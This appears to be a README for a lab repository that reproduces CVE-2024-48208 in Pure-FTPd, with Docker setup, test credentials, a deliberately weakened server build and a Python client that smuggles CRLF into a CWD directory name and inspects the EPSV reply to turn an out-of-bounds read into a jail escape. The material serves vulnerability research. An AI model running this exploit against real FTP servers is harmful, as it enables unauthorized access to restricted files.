# CVE-2024-48208

This repo contains a Dockerfile to spin up a container for testing and working on CVE-2024-48208.

### Attack path:

1. Reproduce the CVE: done.
2. Understand what we are reading through the OOB read: done (it reads the reply buffer).
3. Understand how a user can influence that buffer: done (the reply buffer holds the reply to the last request, so its contents follow from the previous command).
4. Make a directory whose name contains CRLF characters: done (Python script).
5. Check that the chdir() into it succeeds: done.
6. Set up EPSV mode and inspect the response: done (the directory name currently changes with every exploit run).
7. Check whether this can be replicated for restricted directories: done (with a directory owned by ftpuser2).
8. Present the result as a pivot from the original CVE (an OOB read) to a jail escape / broken access control: done.
9. Exploit automation: done.

### Building the environment:

`sudo docker build -t pure-ftpd-vuln .`

`sudo docker run -d -p 21:21 -it --name pure-ftpd-vuln pure-ftpd-vuln`

### Accessing FTP:

Open a terminal and type `ftp `, then enter the following username and password:

`ftpuser:test`

### Building FTP locally:

Open a terminal, cd to the pureftpd directory and run `make; make install`. Note that this installs the deliberately weakened build system-wide, so keep it to the container or a throwaway VM.

The pureftpd directory holds code modified for the PoC, with the following changes:

1. A smaller reply buffer, so that a readable filename is easier to show in the out-of-bounds read.
2. Modified response strings, so that they fit in the smaller buffer.
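The FTP side of attack-path steps 4 to 6, as an added example that is not the repo's own PoC script. It assumes the container from this README (ftpuser:test on 127.0.0.1:21); the CRLF directory name in it is constructed, the project's script generates a different name on every run, and where that script creates the directory is not stated here, so `make_dir_on_server` is an assumption that it runs on the server's filesystem. The client talks a raw socket because Python's ftplib refuses to send a command containing CR or LF, and whether the server accepts such a name in CWD is exactly what step 5 checks.

```python
"""Raw-socket FTP client for walking steps 4-6 of the attack path.

Added example for this README; it is not the repo's own PoC script.
Assumptions: the server is the README's container on 127.0.0.1:21 with
the ftpuser:test account, and the directory name below is constructed
(the project's script generates its own name on every run).
"""
import os
import socket

HOST, PORT = "127.0.0.1", 21          # assumption: container published on local port 21
USER, PASSWORD = "ftpuser", "test"    # credentials from the README

# Constructed directory name: CRLF followed by a line shaped like a server
# reply, so that once the name is echoed into the reply buffer it sits there
# as a line of its own.
CRLF_DIR = "x\r\n229 constructed line"


def make_dir_on_server(base: str, name: str = CRLF_DIR) -> str:
    """Step 4: create the CRLF-named directory on the server's filesystem.
    Assumption: this runs where the FTP root lives (e.g. inside the container)."""
    path = os.path.join(base, name)
    os.makedirs(path, exist_ok=True)
    return path


def build_command(verb: str, arg: str = "") -> bytes:
    """Encode one command line. ftplib rejects CR/LF inside a command, which
    is why this uses a raw socket: the CRLF in the name must go out as-is."""
    line = f"{verb} {arg}" if arg else verb
    return line.encode("latin-1") + b"\r\n"


def reply_complete(buf: bytes) -> bool:
    """RFC 959 framing: a reply is done after 'ddd text' or, for a multi-line
    'ddd-' reply, after the closing 'ddd ' line."""
    if len(buf) < 4 or not buf.endswith(b"\r\n"):
        return False
    code, sep = buf[:3], buf[3:4]
    if sep != b"-":
        return True
    last = buf[:-2].rsplit(b"\r\n", 1)[-1]
    return last.startswith(code + b" ")


def parse_reply(raw: bytes):
    """Return (code, lines); code is None when the reply does not start with
    three digits, which a corrupted reply buffer can produce."""
    lines = [l for l in raw.decode("latin-1").split("\r\n") if l]
    head = lines[0][:3] if lines else ""
    code = int(head) if head.isdigit() else None
    return code, lines


def lines_containing(raw: bytes, needle: str):
    """Step 6 check: which lines of a reply carry the constructed marker."""
    return [l for l in parse_reply(raw)[1] if needle in l]


class RawFtp:
    def __init__(self, host=HOST, port=PORT, timeout=3.0):
        self.sock = socket.create_connection((host, port), timeout=timeout)
        self.last_raw = self._read_reply()          # banner

    def _read_reply(self) -> bytes:
        buf = b""
        while not reply_complete(buf):
            try:
                chunk = self.sock.recv(4096)
            except socket.timeout:
                break                               # a corrupted reply may never "complete"
            if not chunk:
                break
            buf += chunk
        return buf

    def cmd(self, verb: str, arg: str = ""):
        self.sock.sendall(build_command(verb, arg))
        self.last_raw = self._read_reply()
        return parse_reply(self.last_raw)


def walk_attack_path(host=HOST, port=PORT, dirname=CRLF_DIR):
    """Steps 5 and 6: chdir into the CRLF-named directory, then EPSV.
    Returns the raw reply bytes of both steps so they can be compared."""
    ftp = RawFtp(host, port)
    if ftp.cmd("USER", USER)[0] != 331 or ftp.cmd("PASS", PASSWORD)[0] != 230:
        raise RuntimeError("login failed: " + repr(ftp.last_raw))
    cwd_code, _ = ftp.cmd("CWD", dirname)           # step 5: 250 means chdir() worked
    if cwd_code != 250:
        raise RuntimeError("chdir failed: " + repr(ftp.last_raw))
    cwd_raw = ftp.last_raw
    ftp.cmd("EPSV")                                  # step 6
    epsv_raw = ftp.last_raw
    ftp.cmd("QUIT")
    return cwd_raw, epsv_raw


if __name__ == "__main__":
    cwd_raw, epsv_raw = walk_attack_path()
    print("CWD reply :", cwd_raw)
    print("EPSV reply:", epsv_raw)
    print("marker in EPSV reply:", lines_containing(epsv_raw, "constructed"))
```

The replies are kept as raw bytes rather than parsed text because the interesting EPSV response is precisely the one that is not well-formed; `reply_complete` falls back to the socket timeout for that case instead of hanging.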